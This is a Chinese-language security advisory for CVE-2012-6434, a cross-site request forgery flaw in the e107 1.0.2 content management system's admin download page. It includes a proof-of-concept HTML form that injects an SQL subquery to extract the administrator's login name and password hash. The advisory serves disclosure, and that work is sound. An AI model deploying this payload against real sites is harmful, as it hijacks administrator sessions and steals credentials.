admin/download.php'跨站请求伪造漏洞

发布日期:2013-01-02
更新日期:2013-01-08

受影响系统:
e107 e107 1.0.2
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57093
 CVE(CAN) ID: CVE-2012-6434
 
e107是用php编写的内容管理系统。

e107 1.0.2及其他版本的e107_admin/download.php存在多个CSRF漏洞,远程攻击者可以通过请求内 (1) download_url, (2) download_url_extended, (3) download_author_email, (4) download_author_website, (5) download_image, (6) download_thumb, (7) download_visible, (8) download_class参数的SQL注入攻击劫持管理员的身份验证,进行未授权数据库操作。
 
<*来源:Joshua Reynolds
 
  链接:
       
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
 <body>
    <form method="POST" action="http://ww.example.com/e107/e107102/e107_admin/download.php?create">
        <input type="hidden" value="1"/>
        <input type="hidden" value="2"/>
        <input type="hidden" value="adminpassdownload"/>
        <input type="hidden" value="test.txt', (select concat(user_loginname,'::',user_password) from e107_user where user_id = '1'), '', '', '', '', '0', '2', '2', '1352526286', '', '', '2', '0', '', '0', '0' ) -- -"/>
        <input type="hidden" value=""/>
        <input type="hidden" value=""/>
        <input type="hidden" value="KB"/>
        <input type="hidden" value=""/>
        <input type="hidden" value=""/>
        <input type="hidden" value=""/>
        <input type="hidden" value=""/>
        <input type="hidden" value=""/>
        <input type="hidden" value=""/>
        <input type="hidden" value=""/>
        <input type="hidden" value="1"/>
        <input type="hidden" value="10%2F11%2f2012+02%3A47%3A47%3A28"/>
        <input type="hidden" value="1"/>
        <input type="hidden" value="0"/>
        <input type="hidden" value="0"/>
        <input type="hidden" value="Submit+Download"/>
    </form>
 </body>
 </html>

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
e107
 ----
 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
 

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wygyxg.html